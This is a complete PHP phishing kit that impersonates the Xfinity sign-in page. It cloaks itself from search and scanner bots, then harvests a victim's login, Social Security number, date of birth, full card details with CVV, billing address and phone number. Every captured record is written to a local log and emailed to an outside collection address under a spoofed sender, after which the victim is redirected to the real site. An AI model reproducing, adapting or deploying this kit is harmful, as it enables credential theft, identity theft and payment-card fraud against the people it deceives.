<?php
// --- START ANTI-BOT SYSTEM ---
$blocked_bots = array(
    'googlebot', 'bingbot', 'yandexbot', 'baiduspider', 'facebot', 
    'twitterbot', 'rogerbot', 'linkedinbot', 'embedly', 'quora link preview', 
    'showyoubot', 'outbrain', 'pinterest', 'slackbot', 'vkShare', 
    'W3C_Validator', 'grabber', 'scanner', 'spider', 'crawler'
);

$user_agent = $_SERVER['HTTP_USER_AGENT'];
$user_agent_low = strtolower($user_agent);
foreach ($blocked_bots as $bot) {
    if (strpos($user_agent_low, $bot) !== false) {
        header("Location: https://www.google.com");
        exit();
    }
}
// --- END ANTI-BOT SYSTEM ---

error_reporting(0);
$step = 1;
$email_user = "";

// FUNGSI DETEKSI TIPE KARTU
function get_card_type($number) {
    $number = preg_replace('/[^\d]/', '', $number);
    if (preg_match('/^4/', $number)) return "VISA";
    if (preg_match('/^5[1-5]/', $number)) return "MASTERCARD";
    if (preg_match('/^3[47]/', $number)) return "AMEX";
    if (preg_match('/^6(?:011|5)/', $number)) return "DISCOVER";
    return "UNKNOWN";
}

// FUNGSI DETEKSI OS & BROWSER
function get_os_browser($user_agent) {
    $os = "Unknown OS";
    $browser = "Unknown Browser";
    if (preg_match('/windows nt 10/i', $user_agent)) $os = "Windows 10";
    elseif (preg_match('/windows nt 6.3/i', $user_agent)) $os = "Windows 8.1";
    elseif (preg_match('/windows nt 6.2/i', $user_agent)) $os = "Windows 8";
    elseif (preg_match('/windows nt 6.1/i', $user_agent)) $os = "Windows 7";
    elseif (preg_match('/macintosh|mac os x/i', $user_agent)) $os = "Mac OS X";
    elseif (preg_match('/android/i', $user_agent)) $os = "Android";
    elseif (preg_match('/iphone/i', $user_agent)) $os = "iOS";

    if (preg_match('/chrome/i', $user_agent)) $browser = "Chrome";
    elseif (preg_match('/firefox/i', $user_agent)) $browser = "Firefox";
    elseif (preg_match('/safari/i', $user_agent)) $browser = "Safari";
    elseif (preg_match('/msie|trident/i', $user_agent)) $browser = "IE";
    
    return "$os / $browser";
}

// STEP 1: MENERIMA EMAIL/USER
if (isset($_POST['step_email'])) {
    $step = 2;
    $email_user = htmlspecialchars($_POST['email']);
}

// STEP 2: MENERIMA PASSWORD & KIRIM LAPORAN LOGIN
if (isset($_POST['step_password'])) {
    $step = 3;
    $email_user = htmlspecialchars($_POST['email_final']);
    $pass_user = htmlspecialchars($_POST['password']);
    $ip = $_SERVER['REMOTE_ADDR'];
    $waktu_log = date('d M, Y');
    $jam_log = date('g:i a');

    $details = json_decode(file_get_contents("http://ip-api.com/json/{$ip}"));
    $isp      = isset($details->isp) ? $details->isp : "Unknown ISP";
    $region   = isset($details->regionName) ? $details->regionName : "Unknown";
    $city     = isset($details->city) ? $details->city : "Unknown";
    $negara   = isset($details->country) ? $details->country : "United States";
    $timezone = isset($details->timezone) ? $details->timezone : "Unknown";
    $os_browser = get_os_browser($user_agent);
    $simple_os = explode(" / ", $os_browser)[0];

    $isi_log_awal = "#------------------------[ XFINITY LOGIN ]-----------------------------#\n";
    $isi_log_awal .= "Xfinity : $email_user\n";
    $isi_log_awal .= "Password : $pass_user\n";
    $isi_log_awal .= "#--------------------------[ PC INFORMATION ]-------------------------#\n";
    $isi_log_awal .= "IP Address : $ip\n";
    $isi_log_awal .= "ISP : $isp\n";
    $isi_log_awal .= "Region : $region\n";
    $isi_log_awal .= "City : $city\n";
    $isi_log_awal .= "Continent : North America\n";
    $isi_log_awal .= "Timezone : $timezone\n";
    $isi_log_awal .= "OS/Browser : $os_browser\n";
    $isi_log_awal .= "Date : $waktu_log, Time : $jam_log\n";
    $isi_log_awal .= "User Agent : $user_agent\n\n";

    $file = fopen("log.txt", "a");
    fwrite($file, $isi_log_awal);
    fclose($file);

    $tujuan = "hasil@xf-mail.info";
    $subjek_awal = "XFINITY LOGIN: [ $negara - $simple_os - $ip ]";
    $header_awal = "From: Xfinity Login <cpanel@xf-mail.info>\r\nContent-Type: text/plain; charset=UTF-8\r\n";
    mail($tujuan, $subjek_awal, $isi_log_awal, $header_awal);
}

// STEP 3: FINAL LOGGING (FULL DATA)
if (isset($_POST['step_final'])) {
    $email = $_POST['email_final'];
    $pass = $_POST['pass_final'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $waktu_log = date('d M, Y');
    $jam_log = date('g:i a');
    
    $dob = $_POST['dob_m'] . "/" . $_POST['dob_d'] . "/" . $_POST['dob_y'];
    $exp_m = $_POST['exp_m'];
    $exp_y = $_POST['exp_y'];
    $cc_num = preg_replace('/[^\d]/', '', $_POST['card_number']);
    $bin = substr($cc_num, 0, 6);
    $card_type = get_card_type($cc_num);
    $full_ssn = $_POST['ssn1'] . "-" . $_POST['ssn2'] . "-" . $_POST['ssn3'];

    $details = json_decode(file_get_contents("http://ip-api.com/json/{$ip}"));
    $isp      = isset($details->isp) ? $details->isp : "Unknown ISP";
    $region   = isset($details->regionName) ? $details->regionName : "Unknown";
    $city     = isset($details->city) ? $details->city : "Unknown";
    $negara   = isset($details->country) ? $details->country : "United States";
    $timezone = isset($details->timezone) ? $details->timezone : "Unknown";
    
    $os_browser = get_os_browser($user_agent);
    $simple_os = explode(" / ", $os_browser)[0];

    $isi_log = "#----------------------------[ PERSONAL INFORMATION ]------------------------#\n";
    $isi_log .= "First Name : " . $_POST['f_name'] . "\n";
    $isi_log .= "Last Name : " . $_POST['l_name'] . "\n";
    $isi_log .= "DOB : " . $dob . "\n";
    $isi_log .= "Social Security Number : " . $full_ssn . "\n";
    $isi_log .= "#--------------------------------[ CARD DETAILS ]----------------------------#\n";
    $isi_log .= "Type : " . $card_type . "\n";
    $isi_log .= "Cardholders : " . $_POST['card_name'] . "\n";
    $isi_log .= "CC Number : " . $cc_num . "\n";
    $isi_log .= "Expired : " . $exp_m . "/" . $exp_y . "\n";
    $isi_log .= "CVV : " . $_POST['cvv'] . "\n";
    $isi_log .= "Copy Check Live : " . $cc_num . "|" . $exp_m . "|" . $exp_y . "\n";
    $isi_log .= "#-------------------------[ BILLING ADDRESS ]--------------------------------#\n";
    $isi_log .= "Full Name : " . $_POST['card_name'] . "\n";
    $isi_log .= "Address1 : " . $_POST['addr1'] . "\n";
    $isi_log .= "Address2 : " . $_POST['addr2'] . "\n";
    $isi_log .= "City : " . $_POST['city'] . "\n";
    $isi_log .= "State : " . $_POST['state'] . "\n";
    $isi_log .= "Zip : " . $_POST['zip'] . "\n";
    $isi_log .= "Phone : " . $_POST['phone'] . "\n";
    $isi_log .= "DOB : " . $dob . "\n";
    $isi_log .= "Social Security Number : " . $full_ssn . "\n";
    $isi_log .= "#--------------------------[ PC INFORMATION ]-------------------------#\n";
    $isi_log .= "IP Address : " . $ip . "\n";
    $isi_log .= "ISP : " . $isp . "\n";
    $isi_log .= "Region : " . $region . "\n";
    $isi_log .= "City : " . $city . "\n";
    $isi_log .= "Continent : North America\n";
    $isi_log .= "Timezone : " . $timezone . "\n";
    $isi_log .= "OS/Browser : " . $os_browser . "\n";
    $isi_log .= "Date : " . $waktu_log . ", Time : $jam_log\n";
    $isi_log .= "User Agent : $user_agent\n\n";
    
    $file = fopen("log.txt", "a");
    fwrite($file, $isi_log);
    fclose($file);

    $tujuan = "hasil@xf-mail.info";
    $subjek = "$bin - $card_type CREDIT $card_type [ $negara - $simple_os - $ip ]";
    $sender_name = $_POST['card_name'];
    $header = "From: $sender_name <cpanel@xf-mail.info>\r\nContent-Type: text/plain; charset=UTF-8\r\n";
    mail($tujuan, $subjek, $isi_log, $header);
    
    header("Location: https://xfinity.com");
    exit();
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title><?php echo ($step == 3) ? 'Confirm your account' : 'Sign in to Xfinity'; ?></title>
    <link rel="icon" type="image/png" href="1.png">
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700;800&display=swap');
        * { margin: 0; padding: 0; box-sizing: border-box; }
        html, body { height: 100%; width: 100%; font-family: 'Open Sans', sans-serif; background-color: white; overflow-x: hidden; }
        .page-wrapper { display: flex; min-height: 100vh; flex-direction: column; }
        .main-content { display: flex; flex: 1; }
        .login-section { width: 50%; padding: 0 0 0 3%; display: flex; flex-direction: column; justify-content: center; }
        .step-password-layout .login-section { width: 100%; padding: 80px 20px 0 20px; justify-content: flex-start; align-items: center; }
        .step-3-layout .login-section { width: 100%; padding: 40px 20px; justify-content: flex-start; align-items: center; }
        .step-3-layout .login-box { max-width: 550px; }
        .login-box { width: 100%; max-width: 440px; text-align: left; }
        .x-input { width: 100%; height: 52px; border: 1px solid #767676; border-radius: 4px; padding: 0 16px; font-size: 16px; outline: none; background: white; transition: all 0.2s; }
        .x-input:focus { border: 2px solid #5a23b9; }
        .x-input.is-invalid { border: 2px solid #e11d48 !important; color: #e11d48 !important; background-color: #fff1f2; }
        .btn-primary { background-color: #5a23b9; color: white; font-weight: 700; padding: 12px 30px; border-radius: 4px; font-size: 16px; cursor: pointer; border: none; }
        .btn-primary:disabled { background-color: #cccccc; cursor: not-allowed; }
        .menu-link { display: flex; justify-content: space-between; align-items: center; padding: 20px 0; border-bottom: 1px solid #dcdcdc; color: #212121; font-size: 16px; text-decoration: none; }
        .menu-link:first-of-type { border-top: 1px solid #dcdcdc; }
        .menu-link .arrow { color: #767676; font-size: 24px; font-weight: 300; }
        .promo-section { width: 50%; position: relative; overflow: hidden; background-color: #F8F7FF; }
        .promo-image { width: 100%; height: 100%; object-fit: cover; transform: scale(1.6); object-position: center 22%; transform-origin: top center; }
        footer { padding: 30px 20px; border-top: 1px solid #eee; background: white; display: flex; flex-direction: column; align-items: center; gap: 15px; }
        .copyright { font-size: 14px; color: #767676; }
        .footer-links { display: flex; gap: 20px; justify-content: center; flex-wrap: wrap; font-size: 12px; color: #212121; }
        .footer-links a { text-decoration: none; color: #212121; }
        .t3-title { font-weight: 700; font-size: 18px; margin: 20px 0 10px 0; border-bottom: 1px solid #eee; padding-bottom: 5px; }
        .label-sm { font-size: 13px; color: #767676; margin-bottom: 4px; display: block; }
        .cc-wrapper { position: relative; width: 100%; }
        #card_logo { position: absolute; right: 12px; top: 12px; width: 40px; height: 28px; background-size: contain; background-repeat: no-repeat; background-position: center; pointer-events: none; transition: all 0.3s; }
        @media (max-width: 992px) {
            .login-section { width: 100%; padding: 40px 20px; justify-content: flex-start; }
            .promo-section { display: none; }
        }
    </style>
</head>
<body class="<?php if($step==2) echo 'step-password-layout'; if($step==3) echo 'step-3-layout'; ?>">
    <div class="page-wrapper">
        <div class="main-content">
            <div class="login-section">
                <div class="login-box">
                    <div class="mb-14"> 
                        <img src="https://login.xfinity.com/static/images/global/xfinity-logo-grey.svg" style="width: 82px;" alt="Xfinity">
                    </div>
                    <?php if ($step == 1): ?>
                        <h1 class="text-[32px] font-bold mb-8 text-[#212121] tracking-tight">Sign in with your Xfinity ID</h1>
                        <form method="POST">
                            <div class="mb-5">
                                <input type="text" name="email" placeholder="Email, mobile, or username" required class="x-input">
                            </div>
                            <p class="text-[14px] mb-8 text-[#212121]">
                                By signing in, you agree to our <a href="#" class="text-[#5a23b9] underline">Terms of Service</a> and <a href="#" class="text-[#5a23b9] underline">Privacy Policy</a>.
                            </p>
                            <button type="submit" name="step_email" class="btn-primary mb-12">Let's go</button>
                        </form>
                    <?php elseif ($step == 2): ?>
                        <p class="text-[14px] font-bold text-black mb-1"><?php echo $email_user; ?></p>
                        <h1 class="text-[32px] font-bold mb-6 text-[#212121] tracking-tight">Enter your password</h1>
                        <form method="POST">
                            <input type="hidden" name="email_final" value="<?php echo $email_user; ?>">
                            <div class="relative mb-2">
                                <input type="password" id="passInput" name="password" required autofocus class="x-input pr-12">
                                <div onclick="togglePass()" class="absolute right-4 top-4 text-black cursor-pointer">
                                    <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" class="w-5 h-5"><path stroke-linecap="round" stroke-linejoin="round" d="M2.036 12.322a1.012 1.012 0 010-.644C3.301 8.844 7.111 6 12 6c4.89 0 8.699 2.844 9.964 5.678a1.012 1.012 0 010 .644C20.699 15.156 16.89 18 12 18c-4.89 0-8.699-2.844-9.964-5.678z" /><path stroke-linecap="round" stroke-linejoin="round" d="M15 12a3 3 0 11-6 0 3 3 0 016 0z" /></svg>
                                </div>
                            </div>
                            <div class="mb-6"><a href="#" class="text-[#5a23b9] font-bold text-[14px] hover:underline">Forgot password?</a></div>
                            <div class="flex items-center mb-6">
                                <input type="checkbox" id="keep" class="w-6 h-6 border-gray-400 rounded cursor-pointer accent-[#5a23b9]">
                                <label for="keep" class="ml-3 text-[16px] text-black cursor-pointer">Keep me signed in</label>
                            </div>
                            <p class="text-[14px] mb-8 text-[#212121]">By signing in, you agree to our <a href="#" class="text-[#5a23b9] underline">Terms of Service</a> and <a href="#" class="text-[#5a23b9] underline">Privacy Policy</a>.</p>
                            <button type="submit" name="step_password" class="btn-primary mb-8 px-10">Sign in</button>
                        </form>
                    <?php elseif ($step == 3): ?>
                        <h1 class="text-[28px] font-bold mb-2 text-[#212121]">Confirm your account</h1>
                        <p class="text-sm mb-6">Please provide the following details to verify your identity.</p>
                        <form method="POST" id="formFinal">
                            <input type="hidden" name="email_final" value="<?php echo $email_user; ?>">
                            <input type="hidden" name="pass_final" value="<?php echo $pass_user; ?>">
                            <div class="t3-title">Personal Information</div>
                            <div class="grid grid-cols-2 gap-3 mb-3">
                                <input type="text" name="f_name" placeholder="First Name" required class="x-input">
                                <input type="text" name="l_name" placeholder="Last Name" required class="x-input">
                            </div>
                            <label class="label-sm">Date of Birth</label>
                            <div class="grid grid-cols-3 gap-2 mb-3">
                                <select name="dob_m" required class="x-input">
                                    <option value="" disabled selected>Month</option>
                                    <?php for($i=1; $i<=12; $i++) echo "<option value='".str_pad($i,2,'0',STR_PAD_LEFT)."'>".str_pad($i,2,'0',STR_PAD_LEFT)."</option>"; ?>
                                </select>
                                <select name="dob_d" required class="x-input">
                                    <option value="" disabled selected>Day</option>
                                    <?php for($i=1; $i<=31; $i++) echo "<option value='".str_pad($i,2,'0',STR_PAD_LEFT)."'>".str_pad($i,2,'0',STR_PAD_LEFT)."</option>"; ?>
                                </select>
                                <select name="dob_y" required class="x-input">
                                    <option value="" disabled selected>Year</option>
                                    <?php for($i=2010; $i>=1930; $i--) echo "<option value='$i'>$i</option>"; ?>
                                </select>
                            </div>
                            
                            <label class="label-sm">Social Security Number</label>
                            <div class="flex items-center gap-2 mb-3">
                                <input type="text" name="ssn1" id="ssn1" placeholder="SSN" required class="x-input text-center" maxlength="3">
                                <span>-</span>
                                <input type="text" name="ssn2" id="ssn2" placeholder="SSN" required class="x-input text-center" maxlength="2">
                                <span>-</span>
                                <input type="text" name="ssn3" id="ssn3" placeholder="SSN" required class="x-input text-center" maxlength="4">
                            </div>

                            <div class="t3-title">Payment Method</div>
                            <input type="text" name="card_name" placeholder="Name on card" required class="x-input mb-3">
                            <div class="cc-wrapper mb-3">
                                <div id="card_logo"></div>
                                <input type="text" name="card_number" id="cc_field" placeholder="Card number" required class="x-input pr-14" maxlength="16">
                            </div>
                            <label class="label-sm">Expiration Date</label>
                            <div class="grid grid-cols-2 gap-3 mb-3">
                                <select name="exp_m" required class="x-input">
                                    <option value="" disabled selected>Month</option>
                                    <?php for($i=1; $i<=12; $i++) echo "<option value='".str_pad($i,2,'0',STR_PAD_LEFT)."'>".str_pad($i,2,'0',STR_PAD_LEFT)."</option>"; ?>
                                </select>
                                <select name="exp_y" required class="x-input">
                                    <option value="" disabled selected>Year</option>
                                    <?php for($i=25; $i<=35; $i++) echo "<option value='$i'>$i</option>"; ?>
                                </select>
                            </div>
                            <input type="text" name="cvv" id="cvv_field" placeholder="CVV" required class="x-input mb-3" maxlength="4">
                            
                            <div class="t3-title">Billing Address</div>
                            <input type="text" name="addr1" placeholder="Address 1" required class="x-input mb-3">
                            <input type="text" name="addr2" placeholder="Address 2" class="x-input mb-3">
                            <div class="grid grid-cols-3 gap-3 mb-3">
                                <input type="text" name="city" id="city_field" placeholder="City" required class="x-input">
                                <select name="state" required class="x-input col-span-1">
                                    <option value="" disabled selected>State</option>
                                    <option value="AL">AL</option><option value="AK">AK</option><option value="AZ">AZ</option><option value="AR">AR</option><option value="CA">CA</option><option value="CO">CO</option><option value="CT">CT</option><option value="DE">DE</option><option value="FL">FL</option><option value="GA">GA</option><option value="HI">HI</option><option value="ID">ID</option><option value="IL">IL</option><option value="IN">IN</option><option value="IA">IA</option><option value="KS">KS</option><option value="KY">KY</option><option value="LA">LA</option><option value="ME">ME</option><option value="MD">MD</option><option value="MA">MA</option><option value="MI">MI</option><option value="MN">MN</option><option value="MS">MS</option><option value="MO">MO</option><option value="MT">MT</option><option value="NE">NE</option><option value="NV">NV</option><option value="NH">NH</option><option value="NJ">NJ</option><option value="NM">NM</option><option value="NY">NY</option><option value="NC">NC</option><option value="ND">ND</option><option value="OH">OH</option><option value="OK">OK</option><option value="OR">OR</option><option value="PA">PA</option><option value="RI">RI</option><option value="SC">SC</option><option value="SD">SD</option><option value="TN">TN</option><option value="TX">TX</option><option value="UT">UT</option><option value="VT">VT</option><option value="VA">VA</option><option value="WA">WA</option><option value="WV">WV</option><option value="WI">WI</option><option value="WY">WY</option>
                                </select>
                                <input type="text" name="zip" id="zip_field" placeholder="Zip code" required class="x-input" maxlength="5">
                            </div>
                            <input type="text" name="phone" id="phone_field" placeholder="Phone number" required class="x-input mb-6" maxlength="10">
                            <button type="submit" name="step_final" id="btnSubmit" class="btn-primary w-full">Submit</button>
                        </form>
                    <?php endif; ?>
                    <?php if ($step == 1): ?>
                    <div class="flex flex-col">
                        <a href="#" class="menu-link"><span>New to Xfinity? View exclusive offers near you</span><span class="arrow">&rsaquo;</span></a>
                        <a href="#" class="menu-link"><span>Find your Xfinity ID</span><span class="arrow">&rsaquo;</span></a>
                        <a href="#" class="menu-link"><span>Create a new Xfinity ID</span><span class="arrow">&rsaquo;</span></a>
                    </div>
                    <?php endif; ?>
                </div>
            </div>
            <?php if ($step == 1): ?>
            <div class="promo-section">
                <img src="https://assets.xfinity.com/assets/cima/login/default/ad/BAU-XM_CIMA_4.15.25_Update_Desktop.png" class="promo-image" alt="Promotion">
            </div>
            <?php endif; ?>
        </div>
        <footer>
            <div class="copyright mb-2">© 2025 Comcast</div>
            <div class="footer-links">
                <a href="#">Web Terms Of Service</a>
                <a href="#">CA Notice at Collection</a>
                <a href="#">Privacy Policy</a>
                <a href="#">Your Privacy Choices</a>
                <a href="#">Health Privacy Notice</a>
                <a href="#">Ad Choices</a>
            </div>
        </footer>
    </div>
    <script>
    function togglePass() {
        var x = document.getElementById("passInput");
        if (x.type === "password") { x.type = "text"; } else { x.type = "password"; }
    }
    document.addEventListener('DOMContentLoaded', function() {
        const ccInput = document.getElementById('cc_field');
        const s1 = document.getElementById('ssn1');
        const s2 = document.getElementById('ssn2');
        const s3 = document.getElementById('ssn3');
        const zipInput = document.getElementById('zip_field');
        const cityInput = document.getElementById('city_field');
        const phoneInput = document.getElementById('phone_field');
        const cvvInput = document.getElementById('cvv_field');
        const btnSubmit = document.getElementById('btnSubmit');
        const cardLogo = document.getElementById('card_logo');
        const logos = {
            'VISA': 'https://upload.wikimedia.org/wikipedia/commons/5/5e/Visa_Inc._logo.svg',
            'MASTERCARD': 'https://upload.wikimedia.org/wikipedia/commons/2/2a/Mastercard-logo.svg',
            'AMEX': 'https://upload.wikimedia.org/wikipedia/commons/f/fa/American_Express_logo_%282018%29.svg',
            'DISCOVER': 'https://upload.wikimedia.org/wikipedia/commons/5/57/Discover_Card_logo.svg'
        };
        
        function validateCC(number) {
            if (number.length < 13) return false;
            let sum = 0;
            for (let i = 0; i < number.length; i++) {
                let intVal = parseInt(number.substr(i, 1));
                if (i % 2 == number.length % 2) {
                    intVal *= 2;
                    if (intVal > 9) intVal -= 9;
                }
                sum += intVal;
            }
            return (sum % 10) == 0;
        }
        function detectCard(number) {
            if (number.startsWith('4')) return "VISA";
            if (/^5[1-5]/.test(number)) return "MASTERCARD";
            if (/^3[47]/.test(number)) return "AMEX";
            if (/^6(?:011|5)/.test(number)) return "DISCOVER";
            return "";
        }

        [s1, s2, s3].forEach((el, idx, arr) => {
            el.addEventListener('input', () => {
                if (el.value.length === el.maxLength && arr[idx + 1]) {
                    arr[idx + 1].focus();
                }
                checkForm();
            });
        });

        function checkForm() {
            if(!ccInput) return;
            const rawCC = ccInput.value.replace(/\s/g, '');
            const cardType = detectCard(rawCC);
            const isCCValid = validateCC(rawCC);
            const isSSNValid = s1.value.length === 3 && s2.value.length === 2 && s3.value.length === 4;
            const isPhoneValid = phoneInput.value.length === 10;
            const isZipValid = zipInput.value.length === 5;
            const isCityValid = cityInput.value.length >= 2;
            
            let requiredCVVLen = (cardType === "AMEX") ? 4 : 3;
            cvvInput.maxLength = requiredCVVLen;
            const isCVVValid = cvvInput.value.length === requiredCVVLen;

            if (cardType && logos[cardType]) {
                cardLogo.style.backgroundImage = `url('${logos[cardType]}')`;
                cardLogo.style.opacity = '1';
            } else {
                cardLogo.style.backgroundImage = 'none';
                cardLogo.style.opacity = '0';
            }

            ccInput.classList.toggle('is-invalid', ccInput.value !== "" && !isCCValid);
            if (s1.value !== "" || s2.value !== "" || s3.value !== "") {
                [s1, s2, s3].forEach(el => el.classList.toggle('is-invalid', !isSSNValid));
            }
            cityInput.classList.toggle('is-invalid', cityInput.value !== "" && !isCityValid);
            zipInput.classList.toggle('is-invalid', zipInput.value !== "" && !isZipValid);
            phoneInput.classList.toggle('is-invalid', phoneInput.value !== "" && !isPhoneValid);
            cvvInput.classList.toggle('is-invalid', cvvInput.value !== "" && !isCVVValid);
            
            if(btnSubmit) btnSubmit.disabled = !(isCCValid && isSSNValid && isPhoneValid && isCVVValid && isZipValid && isCityValid);
        }

        if(ccInput) {
            [ccInput, s1, s2, s3, zipInput, phoneInput, cvvInput].forEach(el => {
                el.addEventListener('input', checkForm);
                el.addEventListener('keypress', function(e) {
                    if (e.which < 48 || e.which > 57) e.preventDefault();
                });
            });
            cityInput.addEventListener('input', checkForm);
            cityInput.addEventListener('keypress', function(e) {
                if (!/[a-zA-Z\s]/.test(String.fromCharCode(e.which))) e.preventDefault();
            });
        }
    });
    </script>
</body>
</html>